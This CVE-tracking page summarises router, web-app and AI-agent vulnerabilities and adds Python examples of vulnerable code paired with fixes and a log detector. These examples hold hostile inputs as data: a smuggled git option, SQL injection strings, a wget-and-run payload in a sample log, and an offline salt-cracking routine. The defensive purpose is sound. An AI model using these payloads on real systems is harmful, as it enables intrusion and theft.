33 CVEs tracked today. 0 Critical, 8 High, 14 Medium, 11 Low.
-
CVE-2026-48831
HIGH
CVSS 7.3
Wine ships a .desktop file that registers itself as a MIME handler for EXE files and several other Windows executable file types. In some configurations, handling of an EXE file causes that file to be blindly executed with the permissions of the invoker. This allows escaping Flatpak and Snap sandbox...
Sandbox Escape
Wine
-
CVE-2026-48829
HIGH
CVSS 7.5
Unauthenticated denial of service in GNU SASL before version 2.2.3 occurs through a NULL pointer dereference in the DIGEST-MD5 authentication mechanism. Remote attackers can crash both client and server applications by sending a malformed authentication token that lacks an equals sign character, causing the getsubopt.c parser to dereference a NULL pointer.
Denial Of Service
Null Pointer Dereference
-
CVE-2026-9360
HIGH
CVSS 7.4
Buffer overflow in Edimax EW-7438RPn Wi-Fi range extender firmware 1.28a enables authenticated remote attackers to execute arbitrary code via malformed POST requests to the wireless encryption configuration endpoint. The vulnerability requires low-privilege authentication and has publicly available exploit code. No vendor response or patch has been provided despite early disclosure attempts.
Buffer Overflow
-
CVE-2026-9348
HIGH
CVSS 7.4
Stack-based buffer overflow in Edimax EW-7438RPn WiFi range extender firmware up to version 1.31 enables authenticated remote attackers to execute arbitrary code by sending malicious input to the /goform/mp endpoint in the web server component. Public exploit code exists on GitHub, though the vulnerability is not listed in CISA KEV. The vendor failed to respond to responsible disclosure attempts, leaving devices unpatched.
Buffer Overflow
Stack Overflow
-
CVE-2026-9346
HIGH
CVSS 7.4
Buffer overflow in Edimax EW-7438RPn WiFi range extender firmware up to version 1.31 enables authenticated remote attackers to execute arbitrary code via crafted POST requests to the wireless table management interface. The vulnerability affects the formWirelessTbl function when processing the submit-url parameter, with publicly available exploit code on GitHub demonstrating the attack method.
Buffer Overflow
-
CVE-2026-9345
HIGH
CVSS 7.4
Buffer overflow in Edimax EW-7438RPn WiFi range extender firmware versions up to 1.31 enables authenticated remote attackers to execute arbitrary code by sending malformed parameters to the device configuration interface. The vulnerability affects the formWizSurvey function in /goform/formWizSurvey when processing ssid, manualssid, ip, mask, or gateway parameters, with publicly available exploit code existing on GitHub.
Buffer Overflow
-
CVE-2026-9344
HIGH
CVSS 7.4
Stack-based buffer overflow in Edimax EW-7438RPn WiFi range extender firmware up to version 1.31 allows authenticated remote attackers to crash or execute code on the device by sending malicious input to the WPS configuration interface. The vulnerability occurs when processing the pinCode or wlan-url parameters in /goform/formWpsStart, with publicly available exploit code on GitHub demonstrating the attack.
Buffer Overflow
Stack Overflow
-
CVE-2026-3515
HIGH
CVSS 8.5
Command injection in Prefect 3.6.18's GitHub integration allows authenticated users to inject arbitrary options into the git command line through the unsanitized reference field. The GitHubRepository block concatenates user input directly into git clone commands, so a crafted reference is parsed by git as additional options (argument injection), which can lead to SSRF, credential theft, or remote code execution. While no active exploitation is confirmed, the straightforward attack vector and high impact make this a priority for organizations using Prefect's GitHub integration features.
RCE
SSRF
GitHub
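The Prefect flaw above is argument injection rather than shell injection: the reference is spliced into a command string that is later word-split, so a reference containing whitespace becomes extra argv tokens that git parses as options (for example `-c` settings that change which helper commands git runs). The following is an added example, not Prefect's code; the function names, the `./repo` target and the `--upload-pack=/tmp/evil.sh` token are illustrative. It contrasts the vulnerable pattern with a builder that validates the reference, keeps it a single token, and terminates option parsing with `--`.

```python
import re
import shlex
import subprocess
from typing import List, Optional

# Added example (not Prefect's code). Function names are illustrative.
# Branch/tag names: no leading '-', no whitespace or shell characters, no '..'.
GIT_REF_RE = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_./-]*$")


def vulnerable_clone_argv(url: str, reference: str) -> List[str]:
    """The vulnerable pattern: user input spliced into one command string that is
    later word-split. A reference containing whitespace yields extra argv tokens,
    and git parses those tokens as options."""
    cmd = f"git clone --depth 1 -b {reference} {url} ./repo"
    return shlex.split(cmd)


def is_safe_reference(reference: str) -> bool:
    """Accept only plausible branch/tag names, rejecting anything git could read
    as an option or that violates git's own ref-name rules."""
    if not reference or len(reference) > 255:
        return False
    if reference.startswith("-") or ".." in reference:
        return False
    if reference.endswith(("/", ".", ".lock")):
        return False
    return GIT_REF_RE.match(reference) is not None


def hardened_clone_argv(url: str, reference: Optional[str] = None) -> List[str]:
    """Build argv as a list (never a shell string): the reference stays one token,
    and `--` stops option parsing before the positional URL and directory."""
    if not url.startswith(("https://", "ssh://", "git@")):
        raise ValueError("unexpected clone URL form")
    argv = ["git", "clone", "--depth", "1"]
    if reference is not None:
        if not is_safe_reference(reference):
            raise ValueError(f"rejected git reference: {reference!r}")
        argv += ["--branch", reference]
    argv += ["--", url, "./repo"]
    return argv


def clone(url: str, reference: Optional[str] = None) -> None:
    """Run the argv list with shell=False; never join it back into a string."""
    subprocess.run(hardened_clone_argv(url, reference), check=True)


if __name__ == "__main__":
    evil = "main --upload-pack=/tmp/evil.sh"   # constructed malicious reference
    print(vulnerable_clone_argv("https://github.com/org/repo.git", evil))
    try:
        hardened_clone_argv("https://github.com/org/repo.git", evil)
    except ValueError as exc:
        print("blocked:", exc)
```

The allow-list regex does the real work; `--` is belt-and-braces for the positional arguments, and passing a list to `subprocess.run` removes the shell from the picture entirely.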
-
CVE-2026-9373
MEDIUM
CVSS 6.3
Improper authentication in the JeecgBoot 3.9.1 OpenAPI endpoint allows remote attackers to bypass authentication checks and perform unauthorized actions, though exploitation is rated difficult due to high attack complexity. No public exploit code has been identified and no vendor response has been received. The published CVSS 3.x base score is 3.7 (AV:N/AC:H/PR:N); the vulnerability poses limited immediate risk but merits monitoring because it is an unauthenticated, network-reachable authentication bypass.
Authentication Bypass
-
CVE-2026-9372
MEDIUM
CVSS 5.5
Server-side request forgery (SSRF) in ItzCrazyKns Vane through version 1.12.1 enables unauthenticated remote attackers to manipulate the baseURL parameter in the Model Provider API, potentially accessing internal resources and services. The exploit has been publicly disclosed via a GitHub issue, and the CVSS temporal score indicates proof-of-concept code exists (E:P). The vendor was notified but has not yet responded or released a patch.
SSRF
-
CVE-2026-9368
MEDIUM
CVSS 5.5
Remote sandbox escape in NousResearch hermes-agent versions up to 2026.4.16 allows unauthenticated attackers to manipulate environment variables through the code execution tool, potentially breaking out of the intended security sandbox. The vulnerability has publicly available exploit code and the vendor has not responded to disclosure attempts, leaving systems unpatched.
Sandbox Escape
-
CVE-2026-9367
MEDIUM
CVSS 5.5
Remote command injection in NousResearch hermes-agent allows unauthenticated attackers to execute arbitrary OS commands through the terminal_tool component's approval mechanism. The vulnerability affects all versions up to commit 5157f5427f19488b31c6fdebbacd15d798ce7f63 and has publicly available exploit code demonstrating the attack. The vendor has not responded to disclosure attempts, leaving users without an official patch.
Command Injection
-
CVE-2026-9366
MEDIUM
CVSS 5.5
Code injection in NousResearch hermes-agent versions up to 2026.4.23 allows remote unauthenticated attackers to inject and execute arbitrary code through the _scan_context_content function in agent/prompt_builder.py. Publicly available exploit code exists, and the vendor has not responded to disclosure attempts.
Code Injection
-
CVE-2026-9364
MEDIUM
CVSS 5.5
SQL injection in Online Art Gallery Shop 1.0 allows unauthenticated remote attackers to manipulate database queries through the social_linked parameter in /admin/adminHome.php. The vulnerability has publicly available exploit code and a published CVSS 3.x base score of 7.3 (High), reflecting impact on the confidentiality, integrity, and availability of the application.
PHP
SQLi
-
CVE-2026-9356
MEDIUM
CVSS 5.5
SQL injection in SourceCodester Hospitals Patient Records Management System 1.0 enables remote unauthenticated attackers to manipulate database queries through the ID parameter in /admin/patients/manage_history.php. Public exploit code exists (GitHub), though the vulnerability is not listed in CISA KEV. The published CVSS 3.x base score of 7.3 (High) reflects the potential for theft and manipulation of patient records.
PHP
SQLi
-
CVE-2026-9355
MEDIUM
CVSS 5.5
SQL injection in SourceCodester Hospitals Patient Records Management System 1.0 allows remote attackers to compromise patient data without authentication via a manipulated ID parameter in /classes/Master.php?f=save_patient_history. The vulnerability has publicly available exploit code (GitHub) and enables unauthorized database access with the potential to read, modify, or delete patient records. The published CVSS 3.x base score of 7.3 (High) reflects the absence of exploitation prerequisites.
PHP
SQLi
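The three SQL injections above (CVE-2026-9364's social_linked parameter, and the ID parameter in CVE-2026-9356 and CVE-2026-9355) share one root cause: a request parameter is interpolated into the SQL text. The following is an added example, not code from either affected application; the schema, rows and function names are constructed. It shows the vulnerable pattern against an in-memory SQLite database, what an `OR` and a `UNION` payload retrieve, and the type-checked, parameterised form that closes the hole.

```python
import sqlite3
from typing import List, Tuple

# Added example; the schema and rows are constructed, not taken from the affected apps.


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE patient_history (id INTEGER PRIMARY KEY, patient TEXT, note TEXT)"
    )
    conn.executemany(
        "INSERT INTO patient_history VALUES (?, ?, ?)",
        [(1, "A. Example", "visit 1"), (2, "B. Example", "visit 2"), (3, "C. Example", "visit 3")],
    )
    return conn


def manage_history_vulnerable(conn: sqlite3.Connection, raw_id: str) -> List[Tuple[int, str]]:
    """Same shape as the PHP pattern: the request parameter becomes part of the SQL text,
    so the attacker controls the query's structure, not just a value."""
    sql = f"SELECT id, patient FROM patient_history WHERE id = {raw_id}"
    return conn.execute(sql).fetchall()


def manage_history_hardened(conn: sqlite3.Connection, raw_id: str) -> List[Tuple[int, str]]:
    """Validate the type first, then bind the value: a bound parameter is data to the
    database engine and can never alter the statement."""
    try:
        record_id = int(raw_id, 10)
    except ValueError:
        raise ValueError("id must be an integer") from None
    return conn.execute(
        "SELECT id, patient FROM patient_history WHERE id = ?", (record_id,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(manage_history_vulnerable(db, "2"))                 # intended use
    print(manage_history_vulnerable(db, "2 OR 1=1"))          # every row
    print(manage_history_vulnerable(db, "0 UNION SELECT id, note FROM patient_history"))
    try:
        manage_history_hardened(db, "2 OR 1=1")
    except ValueError as exc:
        print("rejected:", exc)
```

The integer check is not the fix on its own (a string column would need the same binding without it); binding is what prevents the payload from being parsed as SQL, and the type check simply gives the caller a clean error instead of a silent empty result.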
-
CVE-2026-9354
MEDIUM
CVSS 5.5
Improper output escaping in NousResearch Hermes Agent versions up to 2026.4.16 allows remote unauthenticated attackers to manipulate message formatting in Slack and Mattermost integrations, potentially leading to information disclosure and service disruption. The vulnerability is exploitable via crafted format_message arguments with low attack complexity and requires no user interaction. Public exploit code is available via GitHub Gist. The vendor did not respond to early disclosure attempts, and no patch availability is documented.
Information Disclosure
Mattermost
-
CVE-2026-9353
MEDIUM
CVSS 5.5
Remote injection vulnerability in NousResearch hermes-agent versions up to 2026.4.23 enables unauthenticated attackers to inject malicious payloads through the Skills Guard component's multi-word prompt handling mechanism. The vulnerability has publicly available exploit code and allows attackers to achieve limited confidentiality, integrity, and availability impacts without user interaction. Despite early vendor notification, no response or patch has been provided.
Information Disclosure
-
CVE-2026-9352
MEDIUM
CVSS 5.5
Information disclosure in NousResearch hermes-agent allows remote unauthenticated attackers to extract sensitive data via crafted requests to the Messaging Gateway Handler's environment configuration function. The vulnerability affects versions up to 2026.4.23 with publicly available exploit code demonstrating the attack. EPSS data not provided, but public POC availability increases immediate risk. Vendor has not responded to disclosure, suggesting no official patch timeline.
Information Disclosure
-
CVE-2026-9351
MEDIUM
CVSS 5.5
Path traversal in NousResearch hermes-agent through version 2026.4.16 allows remote unauthenticated attackers to bypass path restrictions and modify or disrupt file operations via the read_file tool. The flaw exists in the _is_blocked_device function within tools/file_tools.py. Public exploit code is available (EPSS data not provided, but exploit confirmed). Vendor was notified but did not respond, suggesting no official patch exists at time of analysis.
Path Traversal
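A device blocklist applied to the raw path string, the kind of check CVE-2026-9351 describes in `_is_blocked_device`, is bypassed by any spelling the filesystem resolves differently: `/./dev/zero`, `/tmp/../dev/zero`, or a symlink inside the workspace pointing at a device. The following is an added example, not hermes-agent's code; the blocklist, workspace root and function names are assumptions. It contrasts the weak prefix test with a check on the canonicalised path, and then verifies the opened descriptor is a regular file, which catches what no path check can.

```python
import os
import shutil
import stat
import tempfile
from typing import Dict

# Added example, not hermes-agent's code. Blocklist and workspace layout are assumptions.
BLOCKED_DEVICE_PREFIXES = ("/dev/", "/proc/", "/sys/")


def naive_is_blocked(path: str) -> bool:
    """Prefix test on the raw string: '/./dev/zero' and '/tmp/../dev/zero' slip past."""
    return path.startswith(BLOCKED_DEVICE_PREFIXES)


def hardened_is_blocked(path: str) -> bool:
    """Canonicalise first ('.', '..' and symlinks), then test the result."""
    real = os.path.realpath(path)
    return real.startswith(BLOCKED_DEVICE_PREFIXES) or real in ("/dev", "/proc", "/sys")


def read_file_checked(path: str, allowed_root: str, limit: int = 1 << 16) -> bytes:
    """Resolve, confine to allowed_root, refuse device paths, then confirm the opened
    descriptor really is a regular file. O_NONBLOCK keeps a FIFO from stalling open(),
    and the fstat check refuses devices such as /dev/zero that would never hit EOF."""
    real = os.path.realpath(path)
    root = os.path.realpath(allowed_root)
    if hardened_is_blocked(real):
        raise PermissionError(f"device path refused: {real}")
    if os.path.commonpath([real, root]) != root:
        raise PermissionError(f"outside workspace: {real}")
    flags = os.O_RDONLY
    for name in ("O_NONBLOCK", "O_NOFOLLOW", "O_CLOEXEC"):
        flags |= getattr(os, name, 0)
    fd = os.open(real, flags)
    try:
        if not stat.S_ISREG(os.fstat(fd).st_mode):
            raise PermissionError(f"not a regular file: {real}")
        chunks, remaining = [], limit
        while remaining:
            chunk = os.read(fd, remaining)
            if not chunk:
                break
            chunks.append(chunk)
            remaining -= len(chunk)
        return b"".join(chunks)
    finally:
        os.close(fd)


def demo() -> Dict[str, object]:
    """Constructed workspace: a plain file, a symlink to /dev/zero, and a '..' traversal."""
    ws = tempfile.mkdtemp(prefix="agent-ws-")
    try:
        note = os.path.join(ws, "notes.txt")
        with open(note, "w") as fh:
            fh.write("ok")
        link = os.path.join(ws, "zero")
        os.symlink("/dev/zero", link)           # attacker-placed symlink inside the workspace
        results: Dict[str, object] = {"plain": read_file_checked(note, ws)}
        probes = {
            "symlink_to_device": link,
            "traversal": os.path.join(ws, "..", "..", "etc", "hostname"),
        }
        for name, target in probes.items():
            try:
                read_file_checked(target, ws)
                results[name] = "allowed"
            except PermissionError:
                results[name] = "blocked"
        return results
    finally:
        shutil.rmtree(ws, ignore_errors=True)


if __name__ == "__main__":
    print(naive_is_blocked("/./dev/zero"), hardened_is_blocked("/./dev/zero"))
    print(demo())
```

The allow-list root is the primary control; the device blocklist and the `S_ISREG` test are there because a workspace the agent can write into is also a place it can plant symlinks, and the check-then-open race is closed by testing the descriptor rather than the name.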
-
CVE-2026-9350
MEDIUM
CVSS 5.5
Missing authorization in NousResearch hermes-agent versions up to 2026.4.16 allows remote attackers to bypass the command-approval checks in the Batch Runner component, potentially executing unauthorized commands. The vulnerability affects the check_all_command_guards function in tools/approval.py and can be exploited without authentication. Publicly available exploit code exists, though the vulnerability is not yet confirmed in CISA KEV.
Authentication Bypass
-
CVE-2026-9349
MEDIUM
CVSS 5.5
Information disclosure in Cal.com cal.diy up to version 4.9.4 allows remote unauthenticated attackers to access sensitive booking data through manipulation of the cancelledBy/rescheduledBy parameters in the bookings single view API endpoint. The vulnerability affects the Generic React API's getServerSideProps function, enabling unauthorized retrieval of booking-related information. Public exploit code exists demonstrating the attack technique, and the vendor has not responded to coordinated disclosure attempts, leaving users to apply their own mitigations.
Information Disclosure
-
CVE-2026-9371
LOW
CVSS 2.9
Missing authentication in Vane up to 1.12.1 allows remote attackers to bypass intended access controls on API route.ts endpoints, potentially exposing or manipulating API functionality without credentials. Publicly available exploit code exists (GitHub issue #1123), though CVSS rates attack complexity as high (AC:H) with difficult exploitation, resulting in limited confidentiality, integrity, and availability impact (C:L/I:L/A:L). EPSS data not provided. Not listed in CISA KEV. Vendor (ItzCrazyKns) reportedly plans to implement basic authentication as remediation.
Authentication Bypass
-
CVE-2026-9370
LOW
CVSS 2.9
Cryptographic salt generation in the Jasypt Spring Boot library (versions ≤3.0.5 and ≤4.0.4) uses predictable values, enabling offline password cracking attacks against encrypted configuration properties. The SimpleGCMConfig class's getSecretKeySaltGenerator function generates salts without sufficient entropy, reducing the computational cost for attackers who obtain encrypted passwords to derive plaintext through dictionary or brute-force attacks. Public exploit code exists (POC available); the published CVSS base score is 3.7 with high attack complexity (AC:H), and EPSS data was not provided. Vendor has not responded to responsible disclosure as of analysis date.
Java
Information Disclosure
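The cost reduction behind CVE-2026-9370 is amortisation: with one predictable salt, an attacker derives each candidate key once and reuses it against every encrypted property (or precomputes the table before ever seeing a ciphertext), whereas a fresh random salt per value forces the full KDF cost per ciphertext. The following is an added example, not Jasypt's code; it is a toy construction (PBKDF2 for key derivation, HMAC-SHA256 standing in for the AES-GCM stream and authentication tag) with a constructed master password, wordlist and properties. It counts KDF invocations under both salt policies.

```python
import hashlib
import hmac
import os
from typing import Dict, List, Optional, Tuple

# Added example, not Jasypt's code. Toy construction: PBKDF2 derives the key, and
# HMAC-SHA256 stands in for the AES-GCM keystream and authentication tag.
ITERATIONS = 1000              # kept low so the demo runs quickly
MASTER_PASSWORD = "hunter2"    # constructed; one master password protects every property
FIXED_SALT = b"\x00" * 16      # what a predictable salt generator amounts to


def derive_key(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS, dklen=32)


def protect(password: str, plaintext: bytes, salt: bytes) -> Dict[str, bytes]:
    """Encrypt-then-tag under the derived key (stand-in for PBE + AES-GCM)."""
    assert len(plaintext) <= 32
    key = derive_key(password, salt)
    nonce = os.urandom(12)
    stream = hmac.new(key, b"stream" + nonce, "sha256").digest()
    ct = bytes(p ^ s for p, s in zip(plaintext, stream))
    tag = hmac.new(key, b"tag" + nonce + ct, "sha256").digest()
    return {"salt": salt, "nonce": nonce, "ct": ct, "tag": tag}


def open_with_key(key: bytes, rec: Dict[str, bytes]) -> Optional[bytes]:
    """Check the tag with a candidate key; as with GCM, no known plaintext is needed."""
    expect = hmac.new(key, b"tag" + rec["nonce"] + rec["ct"], "sha256").digest()
    if not hmac.compare_digest(expect, rec["tag"]):
        return None
    stream = hmac.new(key, b"stream" + rec["nonce"], "sha256").digest()
    return bytes(c ^ s for c, s in zip(rec["ct"], stream))


def build_records(predictable_salt: bool) -> Dict[str, Dict[str, bytes]]:
    """Constructed encrypted properties, all under the same master password."""
    props = {"db.password": b"pg-secret", "smtp.password": b"mail-secret", "api.key": b"k-1234"}
    return {
        name: protect(MASTER_PASSWORD, val, FIXED_SALT if predictable_salt else os.urandom(16))
        for name, val in props.items()
    }


def crack(records: Dict[str, Dict[str, bytes]], wordlist: List[str]) -> Tuple[Dict[str, bytes], int]:
    """Offline dictionary attack. Derived keys are cached per (salt, word): with one
    predictable salt every property shares the cache, so PBKDF2 runs once per word."""
    cache: Dict[Tuple[bytes, str], bytes] = {}
    kdf_calls = 0
    recovered: Dict[str, bytes] = {}
    for name, rec in records.items():
        for word in wordlist:
            k = (rec["salt"], word)
            if k not in cache:
                cache[k] = derive_key(word, rec["salt"])
                kdf_calls += 1
            pt = open_with_key(cache[k], rec)
            if pt is not None:
                recovered[name] = pt
                break
    return recovered, kdf_calls


if __name__ == "__main__":
    words = ["123456", "password", "qwerty", "letmein", "hunter2", "dragon"]  # constructed
    for label, predictable in (("fixed salt", True), ("random salt", False)):
        found, cost = crack(build_records(predictable), words)
        print(f"{label}: recovered {len(found)} properties with {cost} KDF calls")
```

With the master password fifth in the list, the fixed-salt run needs five derivations for all three properties; the random-salt run needs five per property. The gap grows with the number of encrypted values and, in the fixed-salt case, the table can be built before any ciphertext is captured, so the iteration count no longer buys the protection it was configured for.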
-
CVE-2026-9369
LOW
CVSS 1.9
Local privilege escalation in NousResearch hermes-agent 2026.4.23 allows authenticated local users to manipulate plugin discovery logic via HERMES_ENABLE_PROJECT_PLUGINS environment variable, resulting in unauthorized information disclosure and potential integrity compromise of the CLI web-dashboard interface. Publicly available exploit code exists (EPSS data not provided, not listed in CISA KEV). The vendor did not respond to responsible disclosure attempts, leaving remediation status uncertain.
Information Disclosure
-
CVE-2026-9365
LOW
CVSS 2.9
Heap-based buffer overflow in Ettercap's GG protocol dissector (versions up to 0.8.3) allows remote attackers to potentially achieve limited confidentiality, integrity, and availability compromise through crafted network traffic. The vulnerability exists in the ec_gg.c dissector when processing Gadu-Gadu instant messaging protocol packets. Publicly available exploit code exists (GitHub issue #1306), and the vendor has released patch version 0.8.4 (commit feeae6fa). Despite the network attack vector, exploitation difficulty is high (AC:H) and EPSS risk is low, making mass exploitation unlikely.
Buffer Overflow
Heap Overflow
-
CVE-2026-9363
LOW
CVSS 2.1
Command injection in Edimax EW-7438RPn 1.12 allows authenticated remote attackers to execute arbitrary OS commands via the 'method' parameter in the formEZCHNwlanSetup POST handler at /goform/formEZCHNwlanSetu. Public exploit code exists (CVSS E:P), enabling low-complexity attacks that compromise confidentiality, integrity, and availability at low impact levels. EPSS data not available. Not currently listed in CISA KEV, so no in-the-wild exploitation has been confirmed. Vendor was notified but has not issued a patch or advisory.
Command Injection
-
CVE-2026-9362
LOW
CVSS 2.1
Command injection in Edimax EW-7438RPn 1.12 allows authenticated remote attackers to execute arbitrary operating system commands via the max_Conn and timeOut parameters in the formConnectionSetting endpoint. The vulnerability requires low-privilege authentication but no user interaction, with public exploit code available. EPSS data not available; vendor unresponsive to disclosure.
Command Injection
-
CVE-2026-9361
LOW
CVSS 2.1
Remote command injection in Edimax EW-7438RPn 1.12 allows authenticated attackers to execute arbitrary OS commands by manipulating the submit-url parameter in the formAccept function via /goform/formAccep endpoint. Public exploit code is available (EPSS not provided in input data). Vendor was notified but has not responded or issued a patch, leaving devices vulnerable to takeover by users with low-level credentials.
Command Injection
-
CVE-2026-9359
LOW
CVSS 2.1
Command injection in Edimax EW-7438RPn 1.28a allows authenticated remote attackers to execute arbitrary system commands via crafted POST parameters to the /goform/formHwSet endpoint. The vulnerability affects the formHwSet function's handling of multiple configuration parameters including Antenna, Mcs, regDomain, MAC addresses, SSID, and channel settings. Public exploit code exists (CVSS E:P), significantly lowering the barrier to exploitation, though CISA KEV does not list active widespread exploitation at time of analysis.
Command Injection
-
CVE-2026-9358
LOW
CVSS 2.1
Uncontrolled recursion in PostCSS up to 7.1.1 allows remote attackers to trigger denial of service via crafted CSS input; user interaction is required. The vulnerability resides in the toString function of the AST serialization logic (src/selectors/container.js). Publicly available exploit code exists (EPSS data not provided). The vendor considers this low-risk since most users compile their own CSS rather than processing untrusted user-generated CSS, which limits the real-world attack surface in typical deployments.
Denial Of Service
-
CVE-2026-9357
LOW
CVSS 2.0
Cross-site scripting (stored or reflected; VulDB does not specify which) in the vBulletin 6.x login component allows authenticated users with low privileges to inject malicious scripts that execute when other users interact with the manipulated login function. Public proof-of-concept exists (CVSS E:P) but detailed exploitation steps are being withheld by VulDB. Vendor did not respond to disclosure, and no patch release has been announced. EPSS data unavailable; not listed in CISA KEV, suggesting limited observed exploitation despite public POC availability.
XSS
-
CVE-2026-9347
LOW
CVSS 2.1
OS command injection in Edimax EW-7438RPn WiFi range extender firmware versions up to 1.31 allows authenticated remote attackers to execute arbitrary system commands via the formWizSurvey web interface. The vulnerability exists in the /goform/formWizSurvey endpoint where input validation fails on the ip, mask, and gateway parameters. Publicly available exploit code exists (GitHub POC published), though no active exploitation has been confirmed by CISA KEV. EPSS data not available for this recent CVE. Vendor notified but non-responsive; no official patch has been announced.
Command Injection
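The Edimax EW-7438RPn entries on this page (CVE-2026-9360, -9348, -9346, -9345, -9344, -9363, -9362, -9361, -9359 and -9347) name their handlers and parameters, which is enough to write a detection for an unpatched device sitting behind a reverse proxy or WAF that logs POST bodies (a plain access log does not carry them). The following is an added example, not Edimax or VulDB code: the log format and every log line are constructed, the `/goform/<function name>` path is assumed where the advisory gives only the function name, and the length threshold is a judgement call. Values that decode to shell metacharacters are flagged as command injection; oversized values as overflow attempts.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import parse_qs, urlsplit

# Added example. Handlers and parameters come from the advisories on this page; where an
# advisory names only the function, the /goform/<name> path is an assumption. An empty
# tuple means every parameter of that handler is inspected.
WATCHED: Dict[str, Tuple[str, ...]] = {
    "/goform/mp": (),
    "/goform/formWirelessTbl": ("submit-url",),
    "/goform/formWizSurvey": ("ssid", "manualssid", "ip", "mask", "gateway"),
    "/goform/formWpsStart": ("pinCode", "wlan-url"),
    "/goform/formHwSet": (),
    "/goform/formConnectionSetting": ("max_Conn", "timeOut"),
    "/goform/formEZCHNwlanSetup": ("method",),
    "/goform/formAccept": ("submit-url",),
}
SHELL_META = re.compile(r"[;|&`$\n\r]")
MAX_LEN = 128  # assumption: longer than any legitimate field on this device

# Constructed proxy log format: <ts> <src> <method> <path> <status> "<body>"
LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d{3}) "(.*)"$')


def inspect_request(path: str, body: str) -> List[Tuple[str, str, str]]:
    """Return (endpoint, parameter, reason) for each suspicious decoded value."""
    endpoint = urlsplit(path).path
    watched = WATCHED.get(endpoint)
    if watched is None:
        return []
    findings = []
    for name, values in parse_qs(body, keep_blank_values=True).items():
        if watched and name not in watched:
            continue
        for value in values:                      # parse_qs has already URL-decoded
            if SHELL_META.search(value):
                findings.append((endpoint, name, "shell metacharacter (command injection)"))
            if len(value) > MAX_LEN:
                findings.append((endpoint, name, f"value length {len(value)} (overflow attempt)"))
    return findings


def scan(lines: List[str]) -> List[Dict[str, str]]:
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ts, src, method, path, _status, body = m.groups()
        if method != "POST":
            continue
        for endpoint, param, reason in inspect_request(path, body):
            hits.append({"ts": ts, "src": src, "endpoint": endpoint, "param": param, "reason": reason})
    return hits


# Constructed sample log: one injection attempt, one oversized value, two benign requests.
SAMPLE_LOG = [
    '2026-05-02T10:14:03Z 203.0.113.5 POST /goform/formHwSet 200 '
    '"Antenna=1&Mcs=7&regDomain=1%3Bwget+http%3A%2F%2F203.0.113.9%2Fx+-O+%2Ftmp%2Fx%3Bsh+%2Ftmp%2Fx"',
    '2026-05-02T10:14:09Z 203.0.113.5 POST /goform/formWpsStart 200 '
    '"pinCode=' + "A" * 600 + '&wlan-url=%2Fwps.asp"',
    '2026-05-02T10:15:41Z 192.168.2.20 POST /goform/formWizSurvey 200 '
    '"ssid=HomeNet&manualssid=&ip=192.168.2.50&mask=255.255.255.0&gateway=192.168.2.1"',
    '2026-05-02T10:16:02Z 192.168.2.20 GET /wizard.asp 200 ""',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Because the device never received a patch, the realistic controls are network ones: this detector identifies who is probing the management interface, and the same parameter list can seed a proxy rule that rejects the request before it reaches the extender.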